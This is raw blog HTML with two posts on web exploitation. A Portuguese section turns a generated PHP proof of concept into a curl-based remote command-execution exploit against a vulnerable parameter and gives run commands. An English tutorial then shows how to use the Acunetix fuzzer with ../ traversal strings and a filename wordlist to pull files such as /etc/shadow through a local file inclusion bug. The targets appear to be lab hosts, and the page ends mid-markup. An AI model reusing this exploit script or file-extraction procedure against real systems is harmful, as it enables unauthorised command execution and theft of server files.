<a href="http://1.bp.blogspot.com/-mKNwikwmf-s/Twl6Aqxlj2I/AAAAAAAAATU/NlMkZ2z23Dc/s1600/ScreenHunter_04+Jan.+08+09.03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="222" src="http://1.bp.blogspot.com/-mKNwikwmf-s/Twl6Aqxlj2I/AAAAAAAAATU/NlMkZ2z23Dc/s320/ScreenHunter_04+Jan.+08+09.03.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
O Exploit Creator funciona, porém, ele se perde em relação a utilização de sub-diretórios. Como podem ver na imagem, o campo url não é preenchido como deveria. A alteração pode ser feita nesta tela mesmo ou no código fonte depois que o exploit é gerado.<br />
<br />
<br />
<br />
<a href="http://2.bp.blogspot.com/-JFQe8R2ZenM/Twl6BMtLLQI/AAAAAAAAATc/hUVE0EbB20Q/s1600/ScreenHunter_03+Jan.+08+09.02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="175" src="http://2.bp.blogspot.com/-JFQe8R2ZenM/Twl6BMtLLQI/AAAAAAAAATc/hUVE0EbB20Q/s320/ScreenHunter_03+Jan.+08+09.02.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Neste caso, é solicitado um valor para a variável "a", que seria o comando a ser executado, o exploit gerado ficaria, vamos dizer, "engessado", mas como é php, as alterações para torna-lo funcional são simples.<br />
<br />
Depois do Poc gerado, pasta alterar o comando da var "a" por $argv[2] ou caso vá usa-lo via web, $_GET['cmd']<br />
<br />
<br />
Segue um exemplo:<br />
<br />
<?php<br />
#<br />
# t.php curl exploit<br />
#<br />
<br />
//<br />
// HTTP GET,<br />
//<br />
<br />
$target = $argv[1];<br />
<br />
$ch = curl_init();<br />
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);<br />
curl_setopt($ch, CURLOPT_URL, "http://$target/t.php?a=$argv[2]");<br />
curl_setopt($ch, CURLOPT_HTTPGET, 1);<br />
curl_setopt($ch, CURLOPT_USERAGENT, "DcLabs)");<br />
curl_setopt($ch, CURLOPT_TIMEOUT, 3);<br />
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);<br />
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);<br />
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");<br />
$buf = curl_exec ($ch);<br />
curl_close($ch);<br />
unset($ch);<br />
<br />
echo $buf;<br />
?><br />
<br />
A linha de comand para execução seria assim:<br />
<br />
php -q exploit.php localhost/teste/ <comando><br />
<br />
Ou caso o path tenha sido ajustado antes da criação do exploit:<br />
<br />
php -q exploit.php localhost <comando><br />
<br />
<br />
Para utilização do exploit é necessário habilitar a extensão curl no php.ini <br />
<br />
extension=php_bz2.dll<br />
extension=php_curl.dll<br />
;extension=php_dba.dll<br />
extension=php_mbstring.dll<br />
extension=php_exif.dll<br />
<br />
Em sistemas com numero maior de arquivos a serem analisados é necessário alterar o parâmetro memory_limit também no php.ini.<br />
Evidentemente que isso vai depender da quantidade de memória da máquina onde o rips está sendo executado. <br />
<br />
<br />
Bom pessoal, foi uma analise bem superficial mesmo, caso eu tenha novidades posto novamente.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-56122415597743512612012-01-03T10:20:00.000-08:002012-01-05T08:09:38.015-08:00Acunetix LFI Pos Exploitation - Downloading Files Structure Part 1 (En-Us)<br />
<div class="separator" style="clear: both; text-align: left;">
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;"></b></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;"><span style="background-color: white; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hi folks!</span></b></div>
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;"><span style="background-color: white;"><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></b><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;"><span style="background-color: white;"><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this article we will show a very interesting feature of </span><span style="font-family: Arial; font-size: 15px; font-style: italic; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Acunetix</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: the HTTP fuzzer. In addition to be used as a fuzzer for web applications and the HTTP protocol itself, it can also be used to effectively exploit a common security flaw: Local File Include or LFI for short. If you are not familiar with this bug, a reference can be found at the end of this document.</span></span></b></div>
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;">
<span style="background-color: white;"><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's get it started: The feature can be located on the left side of Acunetix main screen, as shown below:</span></span></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-GBUelD0tw58/Tvt15gOIQtI/AAAAAAAAARw/_KScvG1cnJ8/s640/intro.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="http://3.bp.blogspot.com/-GBUelD0tw58/Tvt15gOIQtI/AAAAAAAAARw/_KScvG1cnJ8/s400/intro.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Understanding the fuzzer and setting the url:</span></div>
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We will not use the fuzzer as a scanner, the idea here is to use the fuzzer to extract as much information as possible from the target host.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the </span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Fuzzer's main screen</span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is shown a typical HTTP request</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">GET http://hostname/path HTTP/1.1</span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept: */*</span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We will use this space to set up our request in order to exploit the LFI, moreover, as the field is free to edit, we can add and/or change the headers. At this point you should already know the URL of LFI, as exemplified below:</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">GET http://lfi.dc/lfi.php?pag= HTTP/1.1</span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/4.0 (DcLabs)</span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept: */*</span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; text-align: -webkit-auto; vertical-align: baseline;"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;">Therefore, to explore the LFI the url http://lfi.dc/lfi.php?pag= should be used, where "pag" is the vulnerable variable. The value of User-Agent field was changed only to show that the headers can be changed/added without any problems.</span></span></span><br />
<div class="separator" style="clear: both; text-align: -webkit-auto;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-f-R968w0H-4/Tvt4jit1POI/AAAAAAAAAR8/OLxNEVaYZG4/s1600/ScreenHunter_01+Dec.+28+18.13.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="http://1.bp.blogspot.com/-f-R968w0H-4/Tvt4jit1POI/AAAAAAAAAR8/OLxNEVaYZG4/s400/ScreenHunter_01+Dec.+28+18.13.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline;"><span style="font-family: Arial;"><br class="kix-line-break" /></span></span><span style="background-color: white; font-family: Arial; text-align: -webkit-auto;"><span style="font-size: 15px; white-space: pre-wrap;"></span></span><b style="background-color: white; text-align: -webkit-auto;"><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Creating and configuring the Generators</span></div>
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" />As this is a fuzzer, of course it must generate strings, integers, repeated chars and other functions, but as stated above, we will not scan or fuzzer or anything, thus let's take a new role for the generators, we need first to create two generators, of course more complex attacks will require more generators.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Character generator File and repeater</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As its name implies, the Character repeater will repeat a character or string as many times as we want. So let's fill in the fields for the creation, use intuitive names for each generator, when you have several, knowing what they do can be really tricky. The default name generated by Acunetix is Gen_N, where N is a sequential number.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Name: dotslash => Intuitive Name</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Character / String: .././ => If you do not know why we are using the string "../../", I suggest you to read the LFI reference.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Initial count: = 1> Will start the process with the given string ../../</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Final count: 2 => Maximum repetitions for the string ../../</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Increment: 1 => string increment counter</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Encoding: None</span><b style="background-color: white; text-align: -webkit-auto;"><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br />
<b style="background-color: white; text-align: -webkit-auto;"><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This generator was set to a classic LFI attack, so, the field Initial count must be configured according to the amount of "dotslashs" found to exploit the bug. No need to encode the string in this case, so the Encoding field is set to None. Use of base64encoding and URL is a good option to evade possible filters. The second generator (File Generator) will read information from a txt or xml file line by line, so we will use a list of filenames that probably exist in the server attacked. </span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A simple idea to create this list is to run this command on several linux flavors with a lot of installed applications, such as Apache, mysql, wordpress, Cacti, Nagios, Oracle and others.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">find / -type f > wordlist.txt</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The wordlists then was appended and removed identical lines, additionally, the leading "/" was removed too because the string "../../" was used.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Completing the fields of this generator:</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Name: filenames_wordlist => Intuitive Name </span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Fileaname: wordlist.txt => Wordlist name</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Filetype: txt => Wordlist extension</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Encoding: none => No need this time</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-z3Uugu37FGM/Tvt7amO0YXI/AAAAAAAAASI/kqgGfc3WoI4/s400/ScreenHunter_02+Dec.+28+18.25.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-z3Uugu37FGM/Tvt7amO0YXI/AAAAAAAAASI/kqgGfc3WoI4/s320/ScreenHunter_02+Dec.+28+18.25.jpg" width="280" /></a></div>
<div>
<span id="internal-source-marker_0.6442053494974971"></span><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span id="internal-source-marker_0.6442053494974971"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><br /></span></span></span></div>
<span id="internal-source-marker_0.6442053494974971">
<span style="background-color: white;"><b><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After the generators were properly both, created and configured, you must add them to the HTTP request:</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Position the cursor just after pay= select the generator dotslash and click Insert Into Request, repeat the process for filenames_wordlist.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The result should be something like this:</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">GET http://lfi.dc/lfi.php?pag=${dotslash}${filenames_wordlist} HTTP/1.1</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/4.0 (DcLabs)</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept: */*</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Before starting the operation, it is interesting to notice that the filters are designed to separate only relevant results of the attack. This can be created by Fuzzer Filters. Acunetix brings two filters by default, Include Internal Server Error and Invalid username / password combination, the second filter for LFI case is not necessary, just mark and delete it.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Creating and configuring filters:</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Rule Description: Failed to open => intuitive name for the filter <br class="kix-line-break" />Rule type: Exclusion => If the request matches the rule, it will be removed from the report</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Apply to: Response => Where the rule will make the match, in which case it will look the string's size in any response sent by the server.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Regular Expression: failed to open stream => This field is populated with the string that will match with the response from the server and removed from the final report, I chose the string "failed to open stream" because it is a generic PHP error when a file is not found, have no access permission or any other reason why the file can not be read:</span><b><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Permission error:</span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: include(../../../etc/shadow) [</span><a href="http://172.28.8.23/function.include" style="font-weight: bold;"><span style="color: black; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">function.include</span></a><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]: </span><span style="color: red; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">failed to open stream</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Permission denied</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/www/t.php</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on line </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">6</span><br /><b><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: include() [</span><a href="http://172.28.8.23/function.include" style="font-weight: bold;"><span style="color: black; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">function.include</span></a><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]: Failed opening '../../../etc/shadow' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/www/t.php</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on line </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">6</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">File not found:</span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: include(../../../etc/dclabs) [</span><a href="http://172.28.8.23/function.include" style="font-weight: bold;"><span style="color: black; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">function.include</span></a><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]: </span><span style="color: red; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">failed to open stream</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">No such file or directory</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/www/t.php</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on line </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">6</span><b><span style="color: #333333; font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: include() [</span><a href="http://172.28.8.23/function.include" style="font-weight: bold;"><span style="color: black; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">function.include</span></a><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]: Failed opening '../../../etc/dclabs' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/www/t.php</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on line </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">6</span><br /><b><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">imagem4</span><br /><b><span style="font-family: Arial; font-size: 15px; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Therefore, many possibilities will be filtered with a single rule, once done, click Add.<br class="kix-line-break" /> If you need to change the rule, select the desired rule and click update.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Remembering that this rule was made to handle a generic PHP error. Codes where the treatment is done by the programmer are likely to be found, your filter must be adjusted according to the error message returned by the application on this cases.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Ok, now just click on start and reap the files found on the target server.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There's other trick that I will show in the next post. I decided to split in two parts so that the article does not become tiring.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The HTTP Fuzzer is part of the free version of Acunetix.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I made also a video showing the tool running with a smaller wordlist: http://youtu.be/z357C_8H3Mc</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; 